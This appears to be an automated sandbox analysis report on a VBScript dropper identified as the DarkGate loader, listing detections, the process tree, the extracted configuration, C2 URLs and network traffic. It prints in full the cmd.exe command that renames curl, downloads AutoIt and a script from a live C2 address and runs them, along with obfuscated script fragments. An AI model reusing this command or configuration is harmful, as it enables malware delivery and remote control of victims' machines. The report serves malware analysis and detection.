Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.vbs

Overview

General Information

Sample Name:1.vbs
Analysis ID:1313188
MD5:317f213abccd88f7b240063e2bf9995d
SHA1:66e0867a6f86fe25cf6773e58a8ff9ebb34fa36e
SHA256:82e5409032e3d8d85390982fe99a86aa9f313f3c7b68c1e3fb4541d81fe9e24a
Tags:darkgatevbs
Infos:

Detection

DarkGate
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected DarkGate
Sigma detected: DarkGate
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Potential malicious VBS script found (suspicious strings)
Uses known network protocols on non-standard ports
C2 URLs / IPs found in malware configuration
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Yara detected Keylogger Generic
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • wscript.exe (PID: 5528 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 6764 cmdline: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • bpzs.exe (PID: 6948 cmdline: bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • bpzs.exe (PID: 6852 cmdline: bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • Autoit3.exe (PID: 6116 cmdline: Autoit3.exe szkzjr.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
DarkGateFirst documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate
{"C2 url": ["http://94.228.169.143"], "c2_port": 2351, "startup_persistence": true, "rootkit": true, "anti_vm": false, "check_disk": false, "min_disk": 100, "anti_analysis": true, "check_ram": false, "min_ram": 4096, "check_xeon": false, "internal_mutex": "txtMut", "crypter_rawstub": false, "crypter_dll": false, "crypter_au3": true, "flag_14": 4, "crypto_key": "IDmfxvToPtabWZ", "c2_ping_interval": 4, "anti_debug": true, "flag_18": true, "flag_19": true, "flag_22": 8080, "flag_23": "AA11", "flag_24": false, "flag_25": 60, "flag_26": true, "flag_27": false, "flag_28": false, "flag_29": true}
SourceRuleDescriptionAuthorStrings
00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DarkGate_1Yara detected DarkGateJoe Security
    00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DarkGate_1Yara detected DarkGateJoe Security
      00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DarkGate_1Yara detected DarkGateJoe Security
        Process Memory Space: Autoit3.exe PID: 6116JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          Process Memory Space: Autoit3.exe PID: 6116JoeSecurity_DarkGate_1Yara detected DarkGateJoe Security

            Stealing of Sensitive Information

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3, CommandLine: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3, ProcessId: 6764, ProcessName: cmd.exe
            Timestamp:94.228.169.143192.168.2.32351497132048098 09/23/23-08:02:03.355684
            SID:2048098
            Source Port:2351
            Destination Port:49713
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: DarkGate {"C2 url": ["http://94.228.169.143"], "c2_port": 2351, "startup_persistence": true, "rootkit": true, "anti_vm": false, "check_disk": false, "min_disk": 100, "anti_analysis": true, "check_ram": false, "min_ram": 4096, "check_xeon": false, "internal_mutex": "txtMut", "crypter_rawstub": false, "crypter_dll": false, "crypter_au3": true, "flag_14": 4, "crypto_key": "IDmfxvToPtabWZ", "c2_ping_interval": 4, "anti_debug": true, "flag_18": true, "flag_19": true, "flag_22": 8080, "flag_23": "AA11", "flag_24": false, "flag_25": 60, "flag_26": true, "flag_27": false, "flag_28": false, "flag_29": true}
            Source: 1.vbsVirustotal: Detection: 11%Perma Link
            Source: http://94.228.169.143:2351/msibpzszuqiVirustotal: Detection: 6%Perma Link
            Source: http://94.228.169.143:2351/bpzszuqiVirustotal: Detection: 6%Perma Link
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D3FD00 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,4_2_00007FF7F8D3FD00
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D3FCF0 CryptHashData,4_2_00007FF7F8D3FCF0
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D3FCA0 CryptAcquireContextA,CryptCreateHash,4_2_00007FF7F8D3FCA0
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D2486C CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,4_2_00007FF7F8D2486C
            Source: Binary string: wntdll.pdbUGP source: Autoit3.exe, 00000006.00000003.384313885.0000000004206000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000003.384341442.00000000040F4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384687350.000000000427C000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Autoit3.exe, Autoit3.exe, 00000006.00000003.384313885.0000000004206000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000003.384341442.00000000040F4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384687350.000000000427C000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: curl.pdb source: bpzs.exe, 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000004.00000000.366883591.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000002.383565658.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375671616.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.dr

            Networking

            barindex
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 94.228.169.143 2351Jump to behavior
            Source: TrafficSnort IDS: 2048098 ET TROJAN DarkGate AutoIt Downloader 94.228.169.143:2351 -> 192.168.2.3:49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 2351
            Source: unknownNetwork traffic detected: HTTP traffic on port 2351 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 2351
            Source: unknownNetwork traffic detected: HTTP traffic on port 2351 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 2351
            Source: unknownNetwork traffic detected: HTTP traffic on port 2351 -> 49715
            Source: Malware configuration extractorIPs: http://94.228.169.143
            Source: global trafficHTTP traffic detected: POST /bpzszuqi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 0Host: 94.228.169.143:2351
            Source: global trafficTCP traffic: 192.168.2.3:49713 -> 94.228.169.143:2351
            Source: bpzs.exeString found in binary or memory: Usage: curl [options...] <url>
            Source: bpzs.exe, 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: Usage: curl [options...] <url>
            Source: bpzs.exe, 00000004.00000000.366883591.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: Usage: curl [options...] <url>
            Source: bpzs.exe, 00000005.00000002.383565658.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: Usage: curl [options...] <url>
            Source: bpzs.exe, 00000005.00000000.375671616.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: Usage: curl [options...] <url>
            Source: bpzs.exe.2.drString found in binary or memory: Usage: curl [options...] <url>
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: unknownTCP traffic detected without corresponding DNS query: 94.228.169.143
            Source: bpzs.exe, 00000005.00000002.383511096.000001CC7755B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.228.169.143:2341/msibpzszuqi
            Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.228.169.143:2351
            Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.228.169.143:2351/
            Source: wscript.exe, 00000001.00000003.366588675.00000185DFE2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366834023.00000185DFE2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.228.169.143:2351/F
            Source: wscript.exe, 00000001.00000002.366821514.00000185DFDEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.366650857.00000185DFDE6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366834023.00000185DFE4A000.00000004.00000020.00020000.00000000.sdmp, 1.vbsString found in binary or memory: http://94.228.169.143:2351/bpzszuqi
            Source: wscript.exe, 00000001.00000002.366889695.00000185E1BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.228.169.143:2351/bpzszuqi3?
            Source: wscript.exe, 00000001.00000003.366674421.00000185DFDE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366821514.00000185DFDEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.366650857.00000185DFDE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.228.169.143:2351/bpzszuqi~
            Source: bpzs.exe, 00000005.00000002.383511096.000001CC77550000.00000004.00000020.00020000.00000000.sdmp, bpzs.exe, 00000005.00000002.383511096.000001CC7755B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.228.169.143:2351/msibpzszuqi
            Source: bpzs.exe, 00000005.00000002.383511096.000001CC77550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.228.169.143:2351/msibpzszuqiqb
            Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.228.169.143:2351/tem
            Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.228.169.143:2351Cw
            Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.228.169.143:2351O
            Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.228.169.143:2351cm
            Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.228.169.143:2351pace
            Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.228.169.143:2351tem
            Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.228.169.143:2351temkw
            Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
            Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
            Source: Autoit3.exe, 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://darkgate.com
            Source: Autoit3.exe, 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://darkgate.comU
            Source: Autoit3.exeString found in binary or memory: http://go.micr
            Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
            Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
            Source: Autoit3.exe, 00000006.00000002.384435840.0000000000379000.00000002.00000001.01000000.00000006.sdmp, Autoit3.exe.4.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: bpzs.exeString found in binary or memory: https://curl.haxx.se/
            Source: bpzs.exe, 00000004.00000000.366979328.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375677782.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.drString found in binary or memory: https://curl.haxx.se/P
            Source: bpzs.exeString found in binary or memory: https://curl.haxx.se/docs/copyright.html
            Source: bpzs.exe, 00000004.00000000.366979328.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375677782.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.drString found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
            Source: bpzs.exe, bpzs.exe, 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000004.00000000.366883591.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000002.383565658.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375671616.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
            Source: bpzs.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
            Source: bpzs.exe, bpzs.exe, 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000004.00000000.366883591.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000002.383565658.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375671616.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.drString found in binary or memory: https://curl.haxx.se/docs/sslcerts.html
            Source: bpzs.exeString found in binary or memory: https://curl.haxx.se/docs/sslcerts.htmlcurl
            Source: bpzs.exe.2.drString found in binary or memory: https://curl.haxx.se/libcurl/c/curl_easy_setopt.html
            Source: Autoit3.exeString found in binary or memory: https://go.mic
            Source: Autoit3.exeString found in binary or memory: https://go.microso
            Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.drString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: Autoit3.exe.4.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.drString found in binary or memory: https://www.globalsign.com/repository/06
            Source: unknownHTTP traffic detected: POST /bpzszuqi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 0Host: 94.228.169.143:2351
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D16A00 malloc,malloc,recv,send,WSAGetLastError,4_2_00007FF7F8D16A00
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 94.228.169.143:2351Accept: */*User-Agent: curl
            Source: global trafficHTTP traffic detected: GET /msibpzszuqi HTTP/1.1Host: 94.228.169.143:2351User-Agent: curl/7.55.1Accept: */*
            Source: Yara matchFile source: Process Memory Space: Autoit3.exe PID: 6116, type: MEMORYSTR

            System Summary

            barindex
            Source: Initial file: ymhezvoguki="WINHTTP.WinHTTPRequest.5.1"
            Source: Initial file: CreateObject(qcfrjgeqtf).ShellExecute sgaqwhqlaeth, ymhezvoguki2 ,"","",0
            Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D289F84_2_00007FF7F8D289F8
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D0A1624_2_00007FF7F8D0A162
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D2B2504_2_00007FF7F8D2B250
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D07C644_2_00007FF7F8D07C64
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D0ED584_2_00007FF7F8D0ED58
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D07D824_2_00007FF7F8D07D82
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D145564_2_00007FF7F8D14556
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D140B44_2_00007FF7F8D140B4
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D349584_2_00007FF7F8D34958
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D3F1404_2_00007FF7F8D3F140
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D272F44_2_00007FF7F8D272F4
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D3A2C04_2_00007FF7F8D3A2C0
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D1CA684_2_00007FF7F8D1CA68
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D3DB7C4_2_00007FF7F8D3DB7C
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D203744_2_00007FF7F8D20374
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D11D044_2_00007FF7F8D11D04
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D07C6A4_2_00007FF7F8D07C6A
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D435DC4_2_00007FF7F8D435DC
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D1E5904_2_00007FF7F8D1E590
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D07D8C4_2_00007FF7F8D07D8C
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D07D2D4_2_00007FF7F8D07D2D
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D40E904_2_00007FF7F8D40E90
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D48E544_2_00007FF7F8D48E54
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D22F8C4_2_00007FF7F8D22F8C
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D2175C4_2_00007FF7F8D2175C
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D07F2C4_2_00007FF7F8D07F2C
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D107204_2_00007FF7F8D10720
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D368C04_2_00007FF7F8D368C0
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D158C84_2_00007FF7F8D158C8
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042E843C6_3_042E843C
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434940F6_3_0434940F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434B44A6_3_0434B44A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436A4926_3_0436A492
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D74986_3_042D7498
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D15946_3_042D1594
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436F5C76_3_0436F5C7
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436E6156_3_0436E615
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043277206_3_04327720
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434E7766_3_0434E776
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436F7B76_3_0436F7B7
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043437B06_3_043437B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043590B06_3_043590B0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435B0BF6_3_0435B0BF
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436F1AC6_3_0436F1AC
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435C2EB6_3_0435C2EB
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043283106_3_04328310
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436230F6_3_0436230F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043253086_3_04325308
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436F3E86_3_0436F3E8
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434ECA36_3_0434ECA3
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435CC9A6_3_0435CC9A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04331CF06_3_04331CF0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04369D266_3_04369D26
